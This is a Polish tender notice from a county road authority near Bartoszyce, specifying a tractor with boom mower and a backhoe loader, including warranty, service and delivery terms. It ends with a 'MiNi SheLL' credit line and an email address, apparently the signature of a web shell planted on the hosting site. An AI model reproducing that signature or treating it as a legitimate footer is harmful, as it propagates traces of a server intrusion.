14)	Załączanie przedniego napędu i blokady tylnego mostu elektrohydraulicznie
15)	Układ kierowniczy ze wspomaganiem, oś przednia napędzana z ograniczonym poślizgiem
16)	Tylny TUZ o udźwigu min. 3400 kg, z dwoma zewnętrznymi siłownikami wspomagającymi, stabilizatory cięgieł dolnych 
17)	Tylny WOM załączany mechanicznie, co najmniej 2 prędkości wałka odbioru mocy min. 540/1000 obr. / min. z prędkościami zależnymi od prędkości jazdy 
18)	Instalacja hydrauliczna zewnętrzna min. 2 sekcyjna (2 pary wyjść)
19)	Górny i dolny zaczep transportowy, górny z regulowaną wysokością, dolny zaczep rolniczy
20)	Światła wymagane do poruszania się po drogach publicznych lampy halogenowe w dachu kabiny 
21)	Ostrzegawcza lampa zespolona zamontowana na dachu kabiny ciągnika z napisem SŁUŻBA DROGOWA (światło ostrzegawcze w kolorze pomarańczowym - LED), 
22)	Instalacja pneumatyczna jedno i dwuobwodowa 
23)	Ogumienie min: przód  380/70R28, tył: 480/70 R38
24)	Kabina dwudrzwiowa, klimatyzowana, z oknem dachowym 
25)	Fotel kierowcy amortyzowany, regulowany w dwóch pozycjach (góra  dół, przód  tył, pas bezpieczeństwa
26)	Dodatkowe miejsce siedzące pasażera w kabinie z homologacją na dwie osoby
27)	Lusterka zewnętrzne lewe i prawe, dodatkowe lusterko wsteczne wewnątrz kabiny
28)	Wycieraczki szyby przedniej i tylnej
29)	Błotniki kół przednich i tylnych 
30)	Wyposażenie: radio, odblaskowy trójkąt ostrzegawczy, gaśnica, apteczka 
31)	Nawigacja satelitarna GPS z pomiarem stanu paliwa i abonamentem na min. 5 lat.
32)	Osłona zabezpieczająca tylną szybę i boczne przed stłuczeniem wskutek uderzenia kamieniem (siatka zabezpieczająca na szyby boczne i tylną z możliwością demontażu)
33)	Wymagane dokumenty (w języku polskim):  
a)	Instrukcja obsługi pojazdu,
b)	Homologacja: dopuszczenie do ruchu drogowego, rejestracja na dwie osoby, 
c)	Karta lub książka gwarancyjna, 
d)	Katalog części zamiennych,
e)	Książka serwisowa.
f)	Deklarację zgodności CE, 
g)	Inne wymagane prawem dokumenty pojazdu; 
34)	Stacjonarny autoryzowany serwis producenta w odległości nie większej niż 150 km od siedziby Zarząd Dróg Powiatowych w Dąbrowie k/Bartoszyc, Dąbrowa 56A, 11 200 Bartoszyce,
35)	Ubezpieczenie komunikacyjne pojazdu (OC i AC) na okres min. 1 roku 
Parametry techniczne kosiarki 
1)	Fabrycznie nowa
2)	Rok produkcji: 2017
3)	Zasięg koszenia poziomy: min. 570 cm
4)	Zasięg ramienia z głowicą po skłonie skarpy: min. 385 cm
5)	Kąt obrotu głowicy koszącej: min. 195o 
6)	Dwukierunkowa, pływająca głowica tnąca o szerokości min. 100 cm
7)	Niezależny układ hydrauliczny,
8)	Hydrauliczny system bezpieczeństwa zabezpieczenie ramienia powodującego odchylenie ramienia przy najechaniu na przeszkodę
9)	Pulpit sterujący kosiarką w kabinie operatora, zmiana kierunku obrotu rotora regulowana z pulpitu
10)	Wałek WOM.
Kosiarka musi być kompatybilna z oferowanym ciągnikiem bez konieczności ponoszenia przez zamawiającego jakichkolwiek dodatkowych kosztów (np. konieczność dokonywania jakichkolwiek przeróbek lub dodawania do ciągnika jakichkolwiek obciążników zabezpieczających ciągnik przed przechylaniem się w trakcie pracy z kosiarką).
Dostarczony przez Wykonawcę przedmiot zamówienia (ciągnik i kosiarka bijakowa- wysięgnikowa) muszą być kompletne i gotowe do pracy bezpośrednio po dostarczeniu.

Wymagania dodatkowe:
1)	Ciągnik musi spełniać wymagania techniczne określone przez obowiązujące przepisy dla pojazdów poruszających się po drogach publicznych, w tym warunki techniczne wynikające z ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (t. j. Dz. U. z 2005r. Nr 108 poz.908 z późn. zm.) oraz rozporządzeń wykonawczych do tej ustawy.
2)	Ciągnik musi posiadać homologację wystawioną zgodnie z art. 68 ustawy  Prawo o ruchu drogowym.
3)	Wykonawca dokona dostawy oraz rozładunku przedmiotu zamówienia na własny koszt, zapewniając należyte jego zabezpieczenie w czasie transportu oraz przy załadunku i rozładunku.
4)	Z chwilą przekazania Zamawiającemu sprzętu o którym mowa w pkt. 1. na podstawie protokołu odbioru, Wykonawca zobowiązany jest do jednoczesnego dostarczenia Zamawiającemu dokumentów umożliwiających rejestrację ciągnika rolniczego, pełne instrukcje techniczno-eksploatacyjne w języku polskim, książki gwarancyjne, książki serwisowe, certyfikaty bezpieczeństwa CE (deklaracje zgodności), wykazy autoryzowanych stacji serwisowych na terenie Rzeczpospolitej Polskiej. Wszystkie dokumenty muszą być przetłumaczone na język polski. 
5)	Wykonawca zobowiązany jest do przeprowadzenia bezpłatnego szkolenia wyznaczonych przez Zamawiającego osób w zakresie obsługi przedmiotu zamówienia z potwierdzeniem odbycia szkolenia w dniu odbioru lub w innym uzgodnionym terminie jednak nie później niż 14 dni od daty dostarczenia przedmiotu zamówienia.
6)	Wykonawca udzieli pełnej gwarancji na przedmiot zamówienia wynoszącej minimum 24 miesiące  dla ciągnika i 12 m-cy dla kosiarki bez limitu motogodzin. Okres gwarancji liczy się od dnia protokolarnego odbioru przedmiotu zamówienia przez Zamawiającego.
7)	Wykonawca zobowiązuje się do sprawowania autoryzowanego serwisu gwarancyjnego w okresie trwania gwarancji bez dodatkowej opłaty.
8)	Zamawiający wymaga, aby Wykonawca zapewnił wykonywanie przeglądów okresowych  i gwarancyjnych w siedzibie Zamawiającego. Koszty dojazdu do siedziby Zamawiającego oraz koszty materiałów (smary, oleje itp.) pokrywa Wykonawca. W przypadku konieczności wykonania naprawy w serwisie koszty transportu do serwisu i z powrotem do siedziby Zamawiającego pokrywa Wykonawca.
9)	Podjęcie naprawy gwarancyjnej przez serwis, w miejscu ewentualnego unieruchomienia maszyny (siedziba ZDP lub teren Powiatu Bartoszyckiego) w ciągu maksymalnie dwóch dni roboczych od telefonicznego / faksem / drogą elektroniczną  powiadomienia o usterce.
10)	Naprawa gwarancyjna powinna być wykonana w ciągu 7 dni od przyjęcia zgłoszenia o zaistniałej usterce. W przypadku gdyby naprawa wymagała wymiany części, które należy sprowadzić z zagranicy, termin do usunięcia awarii nie może przekroczyć 21 dni licząc od dnia zgłoszenia. Do okresu naprawy nie wlicza się dni ustawowo wolnych od pracy obowiązujących w Polsce.
11)	W razie odrzucenia reklamacji przez Wykonawcę, Zamawiający może złożyć wniosek o przeprowadzenie ekspertyzy przez niezależnego rzeczoznawcę co do zakresu naprawy. 
12)	Jeżeli reklamacja Zamawiającego okaże się uzasadniona, koszty związane z  przeprowadzeniem ekspertyzy ponosi Wykonawca. 
13)	Wykonawca zobowiązuje się do każdorazowego informowania Zamawiającego o zmianie swojej siedziby i numeru telefonu, fax., emaila do zgłaszania awarii sprzętu.
14)	Wykonawca jest odpowiedzialny względem Zamawiającego za wszelkie wady fizyczne przedmiotu umowy.
15)	Termin dostawy: 45 dni od dnia podpisania umowy.
16)	Miejsce dostawy przedmiotu zamówienia: Zarząd Dróg Powiatowych w Dąbrowie Dąbrowa 56A, 11-200 Bartoszyce w godzinach pracy tj. od 7:00 do 15:00 od poniedziałku do piątku. 
17)	Wykonawca jest odpowiedzialny za jakość oraz zgodność przedmiotu zamówienia z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.
18)	Wykonawca zobowiązany jest do wskazania osób niezbędnych do prawidłowej realizacji umowy wraz z ich telefonami kontaktowymi, numerami faksów i adresów mailowych.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>16700000-2, 16310000-1,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 45<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Odległość najbliższego autoryzowanego punktu serwisowego od siedziby ZDP</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawa fabrycznie nowej koparkoładowarki - szt. 1 na plac Zarządu Dróg Powiatowych w Dąbrowie, Dąbrowa 56A, 11-200 Bartoszyce<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowej koparkoładowarki - szt. 1 na plac Zarządu Dróg Powiatowych w Dąbrowie, Dąbrowa 56A, 11-200 Bartoszyce
Charakterystyka techniczna koparko   ładowarki: 
1)	Fabrycznie nowa 
2)	Rok produkcji: 2016 / 2017
3)	Rodzaj paliwa: olej napędowy
4)	Norma emisji spalin: min. TIER 4
5)	Koparko - ładowarka kołowa spełniająca wymagania pojazdu dopuszczonego do poruszania się po drogach publicznych zgodnie z obowiązującymi przepisami ustawy Prawo o ruchu drogowym jako pojazd wolnobieżny 
6)	Masa eksploatacyjna maszyny: max. 9000 kg 
7)	Silnik wysokoprężny o mocy min.: 80 kW (107kM) 
8)	Napęd na dwie osie z możliwością napędu na jedną oś 
9)	Koła jezdne przednie i tylne równe o rozmiarze min. 28 
10)	Przednia oś wychylna, przednie i tylne koła skrętne, tryb skrętu krab 
11)	Skrzynia biegów maszyny powershift, przełączalna pod obciążeniem, cztery biegi w przód, cztery biegi w tył 
12)	Dwa niezależne układy hamowania, hamulec zasadniczy hydrauliczny, mokry, samoregulujący się 
13)	Układ hydrauliczny zasilany pompą wielotłoczkową o wydajności min. 163 litry/min i ciśnieniu roboczym min. 250bar 
14)	Wszystkie główne podzespoły napędowe wyprodukowane przez jednego producenta (silnik, skrzynia biegów, mosty) 
15)	Błotniki kół przednich i tylnych, 
16)	Kabina operatora dwudrzwiowa, klimatyzowana, spełniająca wymagania konstrukcji ochronnej ROPS i FOPS z obrotowym fotelem operatora, deklarowany poziom hałasu w kabinie max: 75dB 
17)	Światła przednie drogowe oraz dodatkowe oświetlenie robocze przód i tył
18)	Ostrzegawcza lampa zespolona zamontowana na dachu kabiny z napisem SŁUŻBA DROGOWA (światło ostrzegawcze w kolorze pomarańczowym - LED) 
19)	Osprzęt ładowarkowy koparkoładowarki : 
a)	System z równoległymi siłownikami przechylania łyżki, zapewniający samopoziomowanie łyżki ładowarkowej 
b)	Układ stabilizacji łyżki ładowarkowej 
c)	Łyżka ładowarkowa dzielona (otwierana), wielofunkcyjna: 6 w jednym  możliwość spychania, ładowania, kopania, chwytania, rozściełania i wyrównywania 
d)	Łyżka wyposażona w widły do palet; 
e)	Pojemność łyżki ładowarki  min. 1,3 m3, szerokość łyżki max. 2,5 m 
f)	Wysokość załadunku min. 3,0 m 
g)	Udźwig na pełną wysokość w łyżce ładowarkowej min. 3 400 kg 
20)	Osprzęt koparkowy podsiębierny koparkoładowarki: 
a)	Możliwość przesuwu bocznego wysięgnika koparkowego 
b)	Łyżka koparkowa 600 mm  700 mm 
c)	Łyżka skarpowa hydrauliczna uchylna szer.  1300 - 1500 mm
d)	Ramie koparkowe o zmiennej długości, rozsuwane hydraulicznie (teleskopowe) 
e)	Wysokość załadunku przy złożonym ramieniu min. 3,7 m 
f)	Udźwig przy złożonym ramieniu min. 1500 kg 
21)	Nawigacja satelitarna GPS z pomiarem stanu paliwa i abonamentem na min. 5 lat
22)	Radio, immobiliser,  gaśnica, trójkąt ostrzegawczy, skrzynka narzędziowa, apteczka
23)	Wymagane dokumenty (w języku polskim):  
a)	Karta lub książka gwarancyjna, 
b)	Deklaracja zgodności CE, dokument potwierdzający dopuszczenie pojazdu do ruchu drogowego jako pojazdu wolnobieżnego, 
c)	Instrukcja obsługi w języku polskim
d)	Katalog części zamiennych 
e)	Inne wymagane prawem dokumenty pojazdu
24)	Stacjonarny autoryzowany serwis producenta w odległości nie większej niż 150 km od siedziby Zarząd Dróg Powiatowych w Dąbrowie k/Bartoszyc, Dąbrowa 56A, 11 200 Bartoszyce,
25)	Ubezpieczenie komunikacyjne pojazdu (OC i AC) na okres min. 1 roku 
Wymagania dodatkowe:
1)	Koparko-ładowarka jako pojazd wolnobieżny musi spełniać wymagania techniczne określone przez obowiązujące przepisy dla pojazdów poruszających się po drogach publicznych, w tym warunki techniczne wynikające z ustawy z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (t. j. Dz. U. z 2005r. Nr 108 poz.908 z późn. zm.) oraz rozporządzeń wykonawczych do tej ustawy 
2)	Całkowity    koszt   dostawy (załadunek, dowóz, rozładunek) koparko-ładowarki do   siedziby   Zamawiającego   pokrywa Wykonawca. 
3)	Wykonawca zapewni należyte zabezpieczenie sprzętu w czasie transportu oraz przy załadunku i rozładunku.
4)	Z chwilą przekazania Zamawiającemu koparko-ładowarki na podstawie protokołu odbioru, Wykonawca zobowiązany jest do jednoczesnego dostarczenia Zamawiającemu wymaganych dokumentów: karty lub książki gwarancyjnej, pełnej instrukcji techniczno-eksploatacyjnej, książki serwisowej, certyfikatów bezpieczeństwa CE (deklaracje zgodności), katalogu części zamiennych, wykazu autoryzowanych stacji serwisowych na terenie Rzeczpospolitej Polskiej oraz innych wymaganych prawem dokumentów pojazdu. Wszystkie dokumenty muszą być przetłumaczone na język polski. 
5)	Wykonawca zobowiązany jest do przeprowadzenia bezpłatnego szkolenia dwóch operatorów wyznaczonych przez Zamawiającego w zakresie budowy, obsługi i eksploatacji koparko - ładowarki z potwierdzeniem odbycia szkolenia w dniu odbioru lub w innym uzgodnionym terminie jednak nie później niż 14 dni od daty dostarczenia przedmiotu zamówienia.
6)	Dostarczone przez Wykonawcę sprzęt musi być gotowy do pracy bez żadnych dodatkowych zakupów i inwestycji.
7)	Wykonawca udzieli gwarancji na przedmiot na okres 36 miesięcy lub 5000 motogodzin w zależności od tego co upłynie szybciej
8)	Okres gwarancji liczy się od dnia protokolarnego przekazania przedmiotu zamówienia Zamawiającemu.
9)	Wykonawca zobowiązuje się do sprawowania autoryzowanego serwisu gwarancyjnego w okresie trwania gwarancji bez dodatkowej opłaty.
10)	Zamawiający wymaga, aby Wykonawca zapewnił wykonywanie przeglądów okresowych i gwarancyjnych w siedzibie Zamawiającego. Koszty dojazdu do siedziby Zamawiającego oraz koszty materiałów (smary, oleje itp.) pokrywa Wykonawca. W przypadku konieczności wykonania naprawy w serwisie koszty transportu do serwisu i z powrotem do siedziby Zamawiającego pokrywa Wykonawca.
11)	Podjęcie naprawy gwarancyjnej przez serwis, w miejscu ewentualnego unieruchomienia maszyny (siedziba ZDP lub teren Powiatu Bartoszyckiego) w ciągu maksymalnie dwóch dni roboczych od telefonicznego / faksem / drogą elektroniczną   powiadomienia o usterce.
12)	Naprawa gwarancyjna powinna być wykonana w ciągu 7 dni od przyjęcia zgłoszenia o zaistniałej usterce. W przypadku gdyby naprawa wymagała wymiany części, które należy sprowadzić z zagranicy, termin do usunięcia awarii nie może przekroczyć 21 dni licząc od dnia zgłoszenia. Do okresu naprawy nie wlicza się dni ustawowo wolnych od pracy obowiązujących w Polsce.
13)	W razie odrzucenia reklamacji przez Wykonawcę, Zamawiający może złożyć wniosek o przeprowadzenie ekspertyzy przez niezależnego rzeczoznawcę co do zakresu naprawy. 
14)	Jeżeli reklamacja Zamawiającego okaże się uzasadniona, koszty związane z przeprowadzeniem ekspertyzy ponosi Wykonawca. 
15)	Wykonawca zobowiązuje się do każdorazowego informowania Zamawiającego o zmianie swojej siedziby i numeru telefonu, fax., emaila do zgłaszania awarii sprzętu.
16)	Wykonawca jest odpowiedzialny względem Zamawiającego za wszelkie wady fizyczne przedmiotu umowy.
17)	Termin dostawy: 45 dni od dnia podpisania umowy.
18)	Miejsce dostawy przedmiotu zamówienia: Zarząd Dróg Powiatowych w Dąbrowie Dąbrowa 56A, 11-200 Bartoszyce w godzinach pracy tj. od 7:00 do 15:00 od poniedziałku do piątku. 
19)	Wykonawca jest odpowiedzialny za jakość oraz zgodność przedmiotu zamówienia z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.
20)	Wykonawca zobowiązany jest do wskazania osób niezbędnych do prawidłowej realizacji umowy wraz z ich telefonami kontaktowymi, numerami faksów i adresów mailowych.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>43261000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 45<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Odległość najbliższego autoryzowanego punktu serwisowego od siedziby ZDP</td><td>10</td></tr><tr><td>Filtr cząstek stałych (DPF)</td><td>30</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com